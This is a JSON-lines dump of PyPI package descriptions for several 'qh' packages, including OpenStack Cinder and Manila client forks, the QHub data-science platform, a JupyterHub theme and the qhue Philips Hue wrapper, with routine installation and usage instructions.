'qhonuskan_votes')AddVotesField, and addObjectsWithScoresManagerto your model.from django.db import models\nfrom qhonuskan_votes.models import VotesField\n\nclass MyModel(models.Model):\n votes = VotesField()\n # Add objects before all other managers to avoid issues mention in http://stackoverflow.com/a/4455374/1462141\n objects = models.Manager()\n\n #For just a list of objects that are not ordered that can be customized.\n objects_with_scores = ObjectsWithScoresManager()\n\n #For a objects ordered by score.\n sort_by_score = SortByScoresManager()\n ...\n ...Syncdb.Extend your urls[1].import qhonuskan_votes.urls\nfrom django.conf.urls.defaults import *\n\nurlpatterns = patterns('',\n ...\n ...\n url(r'^votes/', include(qhonuskan_votes.urls)),\n)Create the list in you view. Use#For a regular list of items without votes from your model use the following:\nitem_list_no_score = Items.objects.all()\n\n#For a list with scores that can be customized with use the following:\nitem_list_unordered_with_scores = Items.objects_with_scores.all()\n#to customize the order by a field unique to your model. So something like this:\nitem_list_unordered_with_scores = Items.objects_with_scores.all().order_by(-date_created)\n\n#To obtain a list of items sorted by vote counts like (1,0,-1) like Reddit:\nitem_list_ordered__scores = Items.sort_by_score.all()Load qhonuskan_votes templatetags from your template. You will need STATIC_PREFIX too.{% load qhonuskan_votes static %}\n{% get_static_prefix as STATIC_PREFIX %}Load default_buttons.css to give little shape to buttonsAfter that line, if you wish you can override some propertiesLoad jquery to your template10. After all, you can add voting_script template tag to your head section.\nIt generates necessary javascript code for ajax requests.{% voting_script %}use vote_buttons_for_object template tag to create buttons.{% for object in objects %}\n

\n {% vote_buttons_for object %}\n
\n {{ object.text }}\n
\n
\n{% endfor %}For further information you can inspect example project at root of the repository.ContributionYou liked this project? Nice. Let\u2019s start with provide your virtual\nenvironment. You can install all you need dependencies:$ pip install -r requirements/development.txtWe have some important conditions during the development of the project:We adopt PEP8 as Python style guide.You can send us patch for reviewing changes, but if you fork the project\nand open a pull request from github, that would be very easy for us.FootNotes[1]To use the views for up voting and down voting you include the urls.py in your\nwebsite\u2019s url patterns. You can serve qhonuskan_votes views wherever you\nwant. Javascript files updates automatically to find qhonuskan_votes views."} +{"package": "qhoptim", "pacakge-description": "No description available on PyPI."} +{"package": "qh-probability", "pacakge-description": "No description available on PyPI."} +{"package": "qh-python-cinderclient", "pacakge-description": "Python bindings to the OpenStack Cinder APIThis is a client for the OpenStack Cinder API. There\u2019s a Python API (thecinderclientmodule), and a command-line script (cinder). Each\nimplements 100% of the OpenStack Cinder API.See theOpenStack CLI Referencefor information on how to use thecindercommand-line tool. You may also want to look at theOpenStack API documentation.The project is hosted onLaunchpad, where bugs can be filed. The code is\nhosted onOpenStack. Patches must be submitted usingGerrit.License: Apache License, Version 2.0PyPi- package installationOnline DocumentationBlueprints- feature specificationsBugs- issue trackingSourceSpecsHow to ContributeContents:Command-line APIPython APICommand-line APIInstalling this package gets you a shell command,cinder, that you\ncan use to interact with any Rackspace compatible API (including OpenStack).You\u2019ll need to provide your OpenStack username and password. You can do this\nwith the--os-username,--os-passwordand--os-tenant-nameparams, but it\u2019s easier to just set them as environment variables:export OS_USERNAME=openstack\nexport OS_PASSWORD=yadayada\nexport OS_TENANT_NAME=myprojectYou will also need to define the authentication url with--os-auth-urland the version of the API with--os-volume-api-version. Or set them as\nenvironment variables as well. Since Block Storage API V2 is officially\ndeprecated, you are encouraged to setOS_VOLUME_API_VERSION=3. If you\nare using Keystone, you need to set theOS_AUTH_URLto the keystone\nendpoint:export OS_AUTH_URL=http://controller:5000/v3\nexport OS_VOLUME_API_VERSION=3Since Keystone can return multiple regions in the Service Catalog, you\ncan specify the one you want with--os-region-name(orexport OS_REGION_NAME). It defaults to the first in the list returned.You\u2019ll find complete documentation on the shell by runningcinder help:usage: cinder [--version] [-d] [--os-auth-system ]\n [--service-type ] [--service-name ]\n [--volume-service-name ]\n [--os-endpoint-type ]\n [--endpoint-type ]\n [--os-volume-api-version ]\n [--bypass-url ] [--retries ]\n [--profile HMAC_KEY] [--os-auth-strategy ]\n [--os-username ] [--os-password ]\n [--os-tenant-name ]\n [--os-tenant-id ] [--os-auth-url ]\n [--os-user-id ]\n [--os-user-domain-id ]\n [--os-user-domain-name ]\n [--os-project-id ]\n [--os-project-name ]\n [--os-project-domain-id ]\n [--os-project-domain-name ]\n [--os-region-name ] [--os-token ]\n [--os-url ] [--insecure] [--os-cacert ]\n [--os-cert ] [--os-key ] [--timeout ]\n ...\n\nCommand-line interface to the OpenStack Cinder API.\n\nPositional arguments:\n \n absolute-limits Lists absolute limits for a user.\n api-version Display the server API version information. (Supported\n by API versions 3.0 - 3.latest)\n availability-zone-list\n Lists all availability zones.\n backup-create Creates a volume backup.\n backup-delete Removes one or more backups.\n backup-export Export backup metadata record.\n backup-import Import backup metadata record.\n backup-list Lists all backups.\n backup-reset-state Explicitly updates the backup state.\n backup-restore Restores a backup.\n backup-show Shows backup details.\n cgsnapshot-create Creates a cgsnapshot.\n cgsnapshot-delete Removes one or more cgsnapshots.\n cgsnapshot-list Lists all cgsnapshots.\n cgsnapshot-show Shows cgsnapshot details.\n consisgroup-create Creates a consistency group.\n consisgroup-create-from-src\n Creates a consistency group from a cgsnapshot or a\n source CG.\n consisgroup-delete Removes one or more consistency groups.\n consisgroup-list Lists all consistency groups.\n consisgroup-show Shows details of a consistency group.\n consisgroup-update Updates a consistency group.\n create Creates a volume.\n credentials Shows user credentials returned from auth.\n delete Removes one or more volumes.\n encryption-type-create\n Creates encryption type for a volume type. Admin only.\n encryption-type-delete\n Deletes encryption type for a volume type. Admin only.\n encryption-type-list\n Shows encryption type details for volume types. Admin\n only.\n encryption-type-show\n Shows encryption type details for a volume type. Admin\n only.\n encryption-type-update\n Update encryption type information for a volume type\n (Admin Only).\n endpoints Discovers endpoints registered by authentication\n service.\n extend Attempts to extend size of an existing volume.\n extra-specs-list Lists current volume types and extra specs.\n failover-host Failover a replicating cinder-volume host.\n force-delete Attempts force-delete of volume, regardless of state.\n freeze-host Freeze and disable the specified cinder-volume host.\n get-capabilities Show backend volume stats and properties. Admin only.\n get-pools Show pool information for backends. Admin only.\n image-metadata Sets or deletes volume image metadata.\n image-metadata-show\n Shows volume image metadata.\n list Lists all volumes.\n manage Manage an existing volume.\n metadata Sets or deletes volume metadata.\n metadata-show Shows volume metadata.\n metadata-update-all\n Updates volume metadata.\n migrate Migrates volume to a new host.\n qos-associate Associates qos specs with specified volume type.\n qos-create Creates a qos specs.\n qos-delete Deletes a specified qos specs.\n qos-disassociate Disassociates qos specs from specified volume type.\n qos-disassociate-all\n Disassociates qos specs from all its associations.\n qos-get-association\n Lists all associations for specified qos specs.\n qos-key Sets or unsets specifications for a qos spec.\n qos-list Lists qos specs.\n qos-show Shows qos specs details.\n quota-class-show Lists quotas for a quota class.\n quota-class-update Updates quotas for a quota class.\n quota-defaults Lists default quotas for a tenant.\n quota-delete Delete the quotas for a tenant.\n quota-show Lists quotas for a tenant.\n quota-update Updates quotas for a tenant.\n quota-usage Lists quota usage for a tenant.\n rate-limits Lists rate limits for a user.\n readonly-mode-update\n Updates volume read-only access-mode flag.\n rename Renames a volume.\n reset-state Explicitly updates the volume state in the Cinder\n database.\n retype Changes the volume type for a volume.\n service-disable Disables the service.\n service-enable Enables the service.\n service-list Lists all services. Filter by host and service binary.\n (Supported by API versions 3.0 - 3.latest)\n set-bootable Update bootable status of a volume.\n show Shows volume details.\n snapshot-create Creates a snapshot.\n snapshot-delete Removes one or more snapshots.\n snapshot-list Lists all snapshots.\n snapshot-manage Manage an existing snapshot.\n snapshot-metadata Sets or deletes snapshot metadata.\n snapshot-metadata-show\n Shows snapshot metadata.\n snapshot-metadata-update-all\n Updates snapshot metadata.\n snapshot-rename Renames a snapshot.\n snapshot-reset-state\n Explicitly updates the snapshot state.\n snapshot-show Shows snapshot details.\n snapshot-unmanage Stop managing a snapshot.\n thaw-host Thaw and enable the specified cinder-volume host.\n transfer-accept Accepts a volume transfer.\n transfer-create Creates a volume transfer.\n transfer-delete Undoes a transfer.\n transfer-list Lists all transfers.\n transfer-show Shows transfer details.\n type-access-add Adds volume type access for the given project.\n type-access-list Print access information about the given volume type.\n type-access-remove Removes volume type access for the given project.\n type-create Creates a volume type.\n type-default List the default volume type.\n type-delete Deletes volume type or types.\n type-key Sets or unsets extra_spec for a volume type.\n type-list Lists available 'volume types'.\n type-show Show volume type details.\n type-update Updates volume type name, description, and/or\n is_public.\n unmanage Stop managing a volume.\n upload-to-image Uploads volume to Image Service as an image.\n version-list List all API versions. (Supported by API versions 3.0\n - 3.latest)\n bash-completion Prints arguments for bash_completion.\n help Shows help about this program or one of its\n subcommands.\n list-extensions\n\nOptional arguments:\n --version show program's version number and exit\n -d, --debug Shows debugging output.\n --os-auth-system \n Defaults to env[OS_AUTH_SYSTEM].\n --service-type \n Service type. For most actions, default is volume.\n --service-name \n Service name. Default=env[CINDER_SERVICE_NAME].\n --volume-service-name \n Volume service name.\n Default=env[CINDER_VOLUME_SERVICE_NAME].\n --os-endpoint-type \n Endpoint type, which is publicURL or internalURL.\n Default=env[OS_ENDPOINT_TYPE] or nova\n env[CINDER_ENDPOINT_TYPE] or publicURL.\n --endpoint-type \n DEPRECATED! Use --os-endpoint-type.\n --os-volume-api-version \n Block Storage API version. Accepts X, X.Y (where X is\n major and Y is minor\n part).Default=env[OS_VOLUME_API_VERSION].\n --bypass-url \n Use this API endpoint instead of the Service Catalog.\n Defaults to env[CINDERCLIENT_BYPASS_URL].\n --retries Number of retries.\n --profile HMAC_KEY HMAC key to use for encrypting context data for\n performance profiling of operation. This key needs to\n match the one configured on the cinder api server.\n Without key the profiling will not be triggered even\n if osprofiler is enabled on server side.\n Defaults to env[OS_PROFILE].\n --os-auth-strategy \n Authentication strategy (Env: OS_AUTH_STRATEGY,\n default keystone). For now, any other value will\n disable the authentication.\n --os-username \n OpenStack user name. Default=env[OS_USERNAME].\n --os-password \n Password for OpenStack user. Default=env[OS_PASSWORD].\n --os-tenant-name \n Tenant name. Default=env[OS_TENANT_NAME].\n --os-tenant-id \n ID for the tenant. Default=env[OS_TENANT_ID].\n --os-auth-url \n URL for the authentication service.\n Default=env[OS_AUTH_URL].\n --os-user-id \n Authentication user ID (Env: OS_USER_ID).\n --os-user-domain-id \n OpenStack user domain ID. Defaults to\n env[OS_USER_DOMAIN_ID].\n --os-user-domain-name \n OpenStack user domain name. Defaults to\n env[OS_USER_DOMAIN_NAME].\n --os-project-id \n Another way to specify tenant ID. This option is\n mutually exclusive with --os-tenant-id. Defaults to\n env[OS_PROJECT_ID].\n --os-project-name \n Another way to specify tenant name. This option is\n mutually exclusive with --os-tenant-name. Defaults to\n env[OS_PROJECT_NAME].\n --os-project-domain-id \n Defaults to env[OS_PROJECT_DOMAIN_ID].\n --os-project-domain-name \n Defaults to env[OS_PROJECT_DOMAIN_NAME].\n --os-region-name \n Region name. Default=env[OS_REGION_NAME].\n --os-token Defaults to env[OS_TOKEN].\n --os-url Defaults to env[OS_URL].\n\nAPI Connection Options:\n Options controlling the HTTP API Connections\n\n --insecure Explicitly allow client to perform \"insecure\" TLS\n (https) requests. The server's certificate will not be\n verified against any certificate authorities. This\n option should be used with caution.\n --os-cacert \n Specify a CA bundle file to use in verifying a TLS\n (https) server certificate. Defaults to\n env[OS_CACERT].\n --os-cert \n Defaults to env[OS_CERT].\n --os-key Defaults to env[OS_KEY].\n --timeout Set request timeout (in seconds).\n\nRun \"cinder help SUBCOMMAND\" for help on a subcommand.If you want to get a particular version API help message, you can add--os-volume-api-versionin help command, like\nthis:cinder --os-volume-api-version 3.28 helpPython APIThere\u2019s also a complete Python API, but it has not yet been documented.Quick-start using keystone:# use v3 auth with http://controller:5000/v3\n>>> from cinderclient.v3 import client\n>>> nt = client.Client(USERNAME, PASSWORD, PROJECT_ID, AUTH_URL)\n>>> nt.volumes.list()\n[...]See release notes and more athttps://docs.openstack.org/python-cinderclient/latest/."} +{"package": "qh-python-manilaclient", "pacakge-description": "Python bindings to the OpenStack Manila APIThis is a client for the OpenStack Manila API. There\u2019s a Python API (themanilaclientmodule), and a command-line script (manila). Each\nimplements 100% of the OpenStack Manila API.See theOpenStack CLI guidefor information on how to use themanilacommand-line tool. You may also want to look at theOpenStack API documentation.The project is hosted onLaunchpad, where bugs can be filed. The code is\nhosted onGithub. Patches must be submitted usingGerrit,notGithub\npull requests.This code is a fork ofCinderclientof Grizzly release and then it was\ndeveloped separately. Cinderclient code is a fork ofJacobian\u2019s python-cloudserversIf you need API support for the Rackspace\nAPI solely or the BSD license, you should use that repository.\npython-manilaclient is licensed under the Apache License like the rest of\nOpenStack.Contents:Command-line APIPython APICommand-line APIInstalling this package gets you a shell command,manila, that you\ncan use to interact with any Rackspace compatible API (including OpenStack).You\u2019ll need to provide your OpenStack username and password. You can do this\nwith the--os-username,--os-passwordand--os-tenant-nameparams, but it\u2019s easier to just set them as environment variables:export OS_USERNAME=foouser\nexport OS_PASSWORD=barpass\nexport OS_TENANT_NAME=fooprojectYou will also need to define the authentication url either with param--os-auth-urlor as an environment variable:export OS_AUTH_URL=http://example.com:5000/v2.0/Since Keystone can return multiple regions in the Service Catalog, you\ncan specify the one you want with--os-region-name(orexport OS_REGION_NAME). It defaults to the first in the list returned.You\u2019ll find complete documentation on the shell by runningmanila help, seemanila help COMMANDfor help on a specific command.Python APIThere\u2019s also a complete Python API, but it has not yet been documented.Quick-start using keystone:# use v2.0 auth with http://example.com:5000/v2.0/\n>>> from manilaclient.v1 import client\n>>> nt = client.Client(USER, PASS, TENANT, AUTH_URL, service_type=\"share\")\n>>> nt.shares.list()\n[...]License: Apache License, Version 2.0PyPi- package installationOnline DocumentationLaunchpad project- release managementBlueprints- feature specificationsBugs- issue trackingSourceHow to ContributeRelease Notes"} +{"package": "qhsdk", "pacakge-description": "qhsdkqhsdk\u7684\u4ecb\u7ecdqhsdk\u4e3b\u8981\u662f\u4e3ahttps://qhkch.com/\u63d0\u4f9b SDK \u7684 Python \u5e93, \u60a8\u53ef\u4ee5\u901a\u8fc7\u5947\u8d27\u53ef\u67e5\u673a\u6784VIP\u63a5\u53e3\u6587\u6863\u4e86\u89e3\u548c\u67e5\u8be2\u8be6\u7ec6\u6570\u636e\u63a5\u53e3\uff01qhsdk\u670d\u52a1\u4e8ewww.qhkch.comqhsdk\u7684\u7279\u8272qhsdk\u4e3b\u8981\u6539\u8fdb\u5982\u4e0b:qhsdk\u652f\u6301Python 3.7\u53ca\u4ee5\u4e0a\u7248\u672c;\u76ee\u524d\u63d0\u4f9b\u5df2\u63d0\u4f9b\u5947\u8d27\u53ef\u67e5\u5168\u90e8\u63a5\u53e3;\u63d0\u4f9b\u5b8c\u5584\u7684\u63a5\u53e3\u6587\u6863, \u63d0\u9ad8qhsdk\u7684\u6613\u7528\u6027;\u5b89\u88c5\u65b9\u6cd5pip install qhsdk\u5347\u7ea7\u65b9\u6cd5pip install qhsdk --upgrade\u5feb\u901f\u5165\u95e8\u76ee\u6807\u6570\u636e: \u5947\u8d27\u53ef\u67e5-\u5546\u54c1-\u6301\u4ed3\u6570\u636e\u63a5\u53e3\u793a\u4f8b\u4ee3\u7801:importqhsdkasqhpro=qh.pro_api(token=\"\u6b64\u5904\u8f93\u5165\u60a8\u7684token, \u8bf7\u8054\u7cfb\u5947\u8d27\u53ef\u67e5\u83b7\u53d6\uff01\")variety_positions_df=pro.variety_positions(fields=\"shorts\",code=\"rb1810\",date=\"2018-08-08\")print(variety_positions_df)\u793a\u4f8b\u7ed3\u679c:broker short short_chge\n0 \u94f6\u6cb3\u671f\u8d27 60987 -4228\n1 \u6c38\u5b89\u671f\u8d27 57520 -1071\n2 \u4e2d\u4fe1\u671f\u8d27 38120 -620\n3 \u56fd\u6cf0\u541b\u5b89 36498 528\n4 \u65b9\u6b63\u4e2d\u671f 32105 4444\n5 \u6d77\u901a\u671f\u8d27 29638 -2783\n6 \u4e1c\u6d77\u671f\u8d27 29250 450\n7 \u5149\u5927\u671f\u8d27 28458 -84\n8 \u5357\u534e\u671f\u8d27 27853 -144\n9 \u4e2d\u8f89\u671f\u8d27 26101 -553\n10 \u4e2d\u5927\u671f\u8d27 23761 1572\n11 \u9c81\u8bc1\u671f\u8d27 22501 -598\n12 \u5174\u8bc1\u671f\u8d27 22262 -842\n13 \u4e1c\u8bc1\u671f\u8d27 21675 -686\n14 \u5fbd\u5546\u671f\u8d27 18966 -607\n15 \u4e2d\u4fe1\u5efa\u6295 18583 -625\n16 \u534e\u6cf0\u671f\u8d27 17076 -5797\n17 \u56fd\u6295\u5b89\u4fe1 16808 349\n18 \u7533\u94f6\u4e07\u56fd 14876 376\n19 \u5e7f\u53d1\u671f\u8d27 14588 -2196\n20 \u5927\u5730\u671f\u8d27 0 -14603\u7279\u522b\u8bf4\u660e\u81f4\u8c22\u7279\u522b\u611f\u8c22AkShare\u9879\u76ee\u63d0\u4f9b\u501f\u9274\u5b66\u4e60\u7684\u673a\u4f1a;\u58f0\u660eqhsdk\u63d0\u4f9b\u7684\u6570\u636e\u4ec5\u4f9b\u53c2\u8003, \u4e0d\u6784\u6210\u4efb\u4f55\u6295\u8d44\u5efa\u8bae;\u4efb\u4f55\u57fa\u4e8eqhsdk\u8fdb\u884c\u7814\u7a76\u7684\u6295\u8d44\u8005\u8bf7\u6ce8\u610f\u6570\u636e\u98ce\u9669;qhsdk\u7684\u4f7f\u7528\u8bf7\u9075\u5faa\u5947\u8d27\u53ef\u67e5\u7f51\u7ad9\u7684\u7528\u6237\u534f\u8bae;qhsdk\u4f7f\u7528\u4ea7\u751f\u7684\u6240\u6709\u95ee\u9898\u7684\u6700\u7ec8\u89e3\u91ca\u6743\u5f52\u5947\u8d27\u53ef\u67e5\u7f51\u7ad9\u6240\u6709;\u7248\u672c\u66f4\u65b0\u8bf4\u660e0.0.1\n\u53d1\u5e03\u6d4b\u8bd5\u7248\u672c\n\n0.0.2\n\u8c03\u8bd5\u63a5\u53e3\n\n0.0.3\n\u589e\u52a0lxml=4.4.1\n\n0.0.4\n\u66f4\u65b0\u8bf4\u660e\u6587\u6863\n\n0.0.5\n\u65b0\u589e\u901a\u8fc7\u7528\u6237\u540d\u548c\u5bc6\u7801\u767b\u5f55\u5e76\u8bbf\u95eeVIP\u8d44\u6e90\u529f\u80fd\n\n0.0.6\n\u4fee\u6b63\u5bfc\u5165\u95ee\u9898\n\n0.0.7\n\u66f4\u65b0 README \u6587\u6863\n\n0.0.8\n\u7b2c\u4e8c\u7248\u63a5\u53e3\u6d4b\u8bd5\n\n0.0.9\n\u66f4\u65b0\u8bf4\u660e\u6587\u6863\n\n0.1.0\n\u66f4\u65b0\u6d4b\u8bd5\u6587\u4ef6\n\n0.1.1\n\u9884\u89c8\u7248\n\n0.1.2\n\u589e\u52a0 token \u4f7f\u7528\u8bf4\u660e\n\n0.1.3\n\u589e\u52a0 inventory \u53c2\u6570\u7c7b\u578b\u4e8c\n\n0.1.4\n\u65b0\u589e: \u5408\u7ea6\u6301\u4ed3\u6570\u636e\u63a5\u53e3, \u5546\u54c1\u6301\u4ed3\u6570\u636e\u63a5\u53e3, \u4fee\u590d\u90e8\u5206\u63a5\u53e3\u4e0e\u6587\u6863\u4e00\u81f4\n\n0.1.5\n\u65b0\u589e: \u589e\u52a0 broker_positions_process \u4e2d start_date \u548c end_date \u53ef\u9009\u53c2\u6570\n\n0.1.6\n\u65b0\u589e: \u589e\u52a0 variety_calc_positions \u63a5\u53e3\n\n0.1.7\n\u4fee\u6539: \u4fee\u6539 variety_all \u63a5\u53e3, \u65b0\u589e 3 \u4e2a\u5b57\u6bb5\n\n0.1.8\n\u65b0\u589e: \u65b0\u589e variety_net_position_list \u63a5\u53e3\n\n0.1.9\n\u65b0\u589e: \u540c\u6b65\u6587\u6863 2021\u5e7411\u670825\u65e5 \u7248\u672c\n\n0.1.10\n\u65b0\u589e: inventory_new \u63a5\u53e3\n\u4fee\u590d\uff1a\u8fd4\u56de\u7a7a\u503c\n\n0.1.11\n\u4fee\u590d: \u4fee\u6539 url \u5730\u5740\u6587\u6863\u6784\u5efacddocspipinstall-rrequirements.txtsphinx-build-bhtml._build"} +{"package": "qhsmodule", "pacakge-description": "No description available on PyPI."} +{"package": "qhub", "pacakge-description": "InformationLinksProjectCommunityCITable of contentsTable of contentsQHub HPCQHub:cloud: Cloud Providers:computer: InstallationPre-requisitesInstall QHub:label: Usage:question: Questions?:book: Code of Conduct:gear: Installing the Development version of QHub:raised_hands: ContributionsOngoing SupportLicenseAutomated data science platform. FromJupyterHubto Cloud environments withDask Gateway.QHub is an open source tool that enables users to build and maintain cost-effective and scalable compute/data science platforms onHPCor onKuberneteswith\nminimal DevOps experience.This repository details theQHub(Kubernetes) version.Not sure what to choose? Check out ourSetup Initializationpage.QHub HPCVersion of QHub based on OpenHPC.NOTE: The tool is currently under development. Curious? Check out theQhub HPCrepository.QHubThe Kubernetes version of QHub is built usingTerraform,Helm, andGitHub Actions. Terraform handles the build, change, and versioning of the infrastructure. Helm helps to define, install,\nand manageKubernetes. GitHub Actions is used to automatically create commits when the\nconfiguration file (qhub-config.yaml) is rendered, as well as to kick off the deployment action.QHub aims to abstract all these complexities for its users. Hence, it is not necessary to know any of the above mentioned technologies to have your project successfully deployed.TLDR: If you know GitHub and feel comfortable generating and using API keys, you should have all it takes to deploy and maintain your system without the need for a dedicated\nDevOps team. No need to learn Kubernetes, Terraform, or Helm.:cloud: Cloud ProvidersQHub offers out-of-the-box support forDigital Ocean, AmazonAWS,GCP, and MicrosoftAzure.For more details, check out the releaseblog post.:computer: InstallationPre-requisitesQHub is supported by macOS and Linux operating systems (Windows isNOTcurrently supported).Compatible with Python 3.7+. New to Python? We recommend usingAnaconda.Adoption of virtual environments (conda,pipenvorvenv) is also encouraged.Install QHubTo install QHub type the following commands in your command line:Install usingconda:condainstall-cconda-forgeqhubInstall usingpip:pipinstallqhubOnce finished, you can check QHub's version (and additional CLI args) by typing:qhub--helpIf successful, the CLI output will be similar to the following:usage:qhub[-h][-v]{deploy,destroy,render,init,validate}...\n\nQHubcommandline\n\npositionalarguments:{deploy,destroy,render,init,validate}QHub\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-v,--versionQHubversion:label: UsageQHub requires the setting of environment variables to automate the deployments fully. For details on how to obtain those variables, check theinstallation guidein the docs.Once all the necessary credentials are gathered and set asUNIX environment variables, QHub can be\ndeployed in under 20 minutes using:qhubinit...# generates initial config file and optionally automates deployment stepsqhubdeploy...# creates and configures the cloud infrastructure:question: Questions?Have a look at ourFAQto see if your query has been answered.We separate the queries for QHub into:GitHub Discussionsused to raise discussions about a subject, such as: \"What is the recommended way to do X with QHub?\"Issuesfor queries, bug reporting, feature requests,documentation, etc.We work around the clock to make QHub better, but sometimes your query might take a while to get a reply. We apologise in advance and ask you to please, be patient :pray:.:book: Code of ConductTo guarantee a welcoming and friendly community, we require contributors to follow ourCode of Conduct.:gear: Installing the Development version of QHubTo install the latest developer version (unstable) use:pipinstallgit+https://github.com/Quansight/qhub.git@dev:raised_hands: ContributionsThinking about contributing? Check out ourContribution Guidelines.Ongoing SupportThev0.4.0release introduced many changes that will irrevocably break your deployment if you attempt an inplace upgrade; for details see ourRELEASEnotes. In order to focus on the future direction of the project, we have decided as a team that we will providelimitedsupport for older versions. Any new user is encouraged to usev0.4.0or greater.If you're using an older version of QHub and would like professional support, please reach out to Quansight.LicenseQHub is BSD3 licensed."} +{"package": "qhub-jupyterhub-theme", "pacakge-description": "Please submit issues tohttps://github.com/quansight/qhub/issuesCustom JupyterHub Template for QHubThis repo contains html jinja2 templates for customising the\nappearance of JupyterHub. Each HTML file here will override the files\ninhttps://github.com/jupyterhub/jupyterhub/tree/master/share/jupyter/hub/templates.UsageInstallqhub_jupyterhub_themein your environmentpipinstallqhub_jupyterhub_themeAdd the following to the jupyterhub configuration to pickup the new\njinja2 templates directory and static files.fromqhub_jupyterhub_themeimporttheme_extra_handlers,theme_template_pathsc.JupyterHub.extra_handlers=theme_extra_handlersc.JupyterHub.template_paths=theme_template_pathsFinally customize the templates via thetemplate_vars. Current\noptions are:hub_titlehub_subtitlewelcomelogoprimary_colorsecondary_color`accent_color'text_colorh1_colorh2_colornavbar_text_colornavbar_hover_colorInternal options:cdsdashboards_enabledcdsdashboards_restrictedqhub_theme_extra_js_urlsInspiration is in the test jupyterhub configurationtest_jupyterhub_config.py.c.JupyterHub.template_vars={'hub_title':'This is QHub','hub_subtitle':'your scalable open source data science laboratory.','welcome':'have fun.',}TestingInstall the development environmentcondaenvinstall-fenvironment.yamlYou do not need to restart jupyterhub to see changes incustomandtemplates. Run jupyterhub via the test scriptjupyterhub--configtest_jupyterhub_config.pyTo run in VSCode, here is a launch.json config:{\n \"name\": \"JupyterHub test\",\n \"type\": \"python\",\n \"request\": \"launch\",\n \"module\": \"jupyterhub\",\n \"args\": [\"-f\", \"./test_jupyterhub_config.py\"],\n \"cwd\": \"${workspaceFolder}\"\n}You would need to make sure the Python virtualenv you've set up for this is active in the project.ChangelogVersion 0.3.6Extend navbar links #16Version 0.3.5Updates to the version display style #15Version 0.3.4Updades to ReadmeExpose navbar color options #12Add option to display Qhub version #13Version 0.3.3Simplify the JupyterHub config (backwards-compatible)Added testing docs for VScodeVersion 0.3.2Added Dashboards menu page and headerAdded custom js tag functionality #11Version 0.3.1Add text color and defaults to template options #9Version 0.3.0Adds colors! :tada:"} +{"package": "qhub-ops", "pacakge-description": "QHub-OpsIs a tool for initializing and maintaining the state of QHub\ndeployments on Digital Ocean, Amazon Web Services, and Google Cloud\nPlatform.Installation:pipinstallqhub-opsConfigurationQHub is entirely controlled from a configuration file. Example\nconfiguration files can be found intests/assets. Documentation\non creating a configuration file is detailedhere.Templates for each file are at the following paths:AWS :: tests/assets/config_aws.yamlDO :: tests/assets/config_do.yamlGCP :: tests/assets/config_gcp.yamlInitializing the Provider TemplateThe exact naming of the configuration file is needed to trigger the CI\nactions when the configuration is changed.mkdir# mv /qhub-ops-config.yamlqhub-opsrender-c/qhub-ops-config.yaml-o/--forceAfter initialising the provider templates, follow the instructions in\ndocs on deploying the infrastructure at/docs/installation.md. At this current moment some\nbootstrapping is required before github-actions can manage the\ninfrastructure as code. All of these instructions are automated inscripts/00-guided-install.sh. Note that you will need to set the\nenvironment variables inintallation.mdfor this script to\nsucceed. You will be prompted several times for use actions such as\nsetting oauth provider and dns.scripts/00-guided-install.shTerraform Module DependenciesThis project depends on the terraform modules repository:https://github.com/Quansight/qhub-terraform-modulesArchitectureThe architecture diagrams for each cloud provider is inarchitecturefolder.\nTo generate them, just run the following command:python.pyLicenseqhub-ops is BSD3 licensed"} +{"package": "qhue", "pacakge-description": "QhueQhue (pronounced 'Q') is an exceedingly thin Python wrapper for the Philips Hue API.I wrote it because some of the other (excellent) frameworks out there weren't quite keeping up with developments in the API. Because Qhue encodes almost none of the underlying models - it's really just a way of constructing URLs and HTTP calls - it should inherit any new API features automatically. The aim of Qhue is not to create another Python API for the Hue system, so much as to turn the existing APIintoPython, with minimal interference.Understanding QhuePhilips, to their credit, created a beautiful RESTful API for the Hue system, documented it and made it available from very early on. If only more manufacturers follwed their example!You can (and should) readthe full documentation here, but a quick summary is that resources like lights, scenes and so forth each have a URL, that might look like this:http://[myhub]/api//lights/1You can read information about light 1 by doing an HTTP GET of this URL, and modify it by doing an HTTP PUT.In theqhuemodule we have a Resource class, which representssomething that has a URL. By calling an instance of this class, you'll make an HTTP request to the hub on that URL.It also has a Bridge class, which is a handy starting point for building Resources (and is itself a Resource). If that seems a bit abstract, don't worry - all will be made clear below.Installing QhueThat's easy.pip install qhueor, more correctly these days:python3 -m pip install qhueYou may want to checkGitHubfor the latest version of the module, and of this documentation. The very latest code is likely to be onthe 'develop' branch.Please note that Qhue, from version 2.0 onwards, expects Python 3 or later. If you still need to support Python 2, you should use an earlier version of Qhue.ExamplesNote: These examples assume you know the IP address of your bridge. Seethe 'Getting Started' section of the API docsif you need help in finding it. I've assigned mine a static address of 192.168.0.45, so that's what you'll see below.They also assume you have experimented with the API before, and so have a user account set up on the bridge, and the username stored somewhere. This is easy to do, but you will need to read the section below entitled 'Creating a user' before actually trying any of the following.OK. Now those preliminaries are out of the way...First, let's create a Bridge, which will be your top-level Resource.# Connect to the bridge with a particular usernamefromqhueimportBridgeb=Bridge(\"192.168.0.45\",username)You can see the URL of any Resource:# This should give you something familiar from the API docs:# the base URL for API calls to your Bridge.print(b.url)By requesting mostotherattributes of a Resource object, you will construct a new Resource with the attribute name added to the URL of the original one:lights=b.lights# Creates a new Resource with its own URLprint(lights.url)# Should have '/lights' on the endOr,toshowitanotherway,here's what these look like on my system:>>>b.url'http://192.168.0.45/api/sQCpOqFjZT2uYlFa2TNKXFbX0RZ6OhBjlYeUo-8F'>>>b.lights.url'http://192.168.0.45/api/sQCpOqFjZT2uYlFa2TNKXFbX0RZ6OhBjlYeUo-8F/lights'Now,theseResourcesare,atthisstage,simply*references*toentitiesonthebridge:theyhaven't communicated with it yet. So far, it'sjustawayofconstructingURLs,andyoucanconstructoneswhichwouldn't actually do anything for you if you tried to use them!# Not actually included with my bridge, but I can still get a URL for it:>>>b.phaser_bank.url'http://192.168.0.45/api/sQCpOqFjZT1uYlFa2TNKXFbX0RZ6OhDjlYeUo-8F/phaser_bank'TomakeanactualAPIcalltothebridge,wesimply*call*theResourceasifitwereafunction:```python# Let's actually call the API and print the resultsprint(b.lights())Qhue takes the JSON that is returned by the API and turns it back into Python objects, typically a dictionary, so you can access its parts easily, for example:# Get the bridge's configuration info as a dict,# and print the ethernet MAC addressprint(b.config()['mac'])So we've seen that you can callb.lights()andb.config(). What other calls can you make to the bridge?Well, you can actually call the bridge itself, and you get back a great big dictionary with everything in it. It's a bit slow, so if you know what you want, it's better to focus on that specific call. But by looking at the keys of that dictionary, you can see what the top-level groups 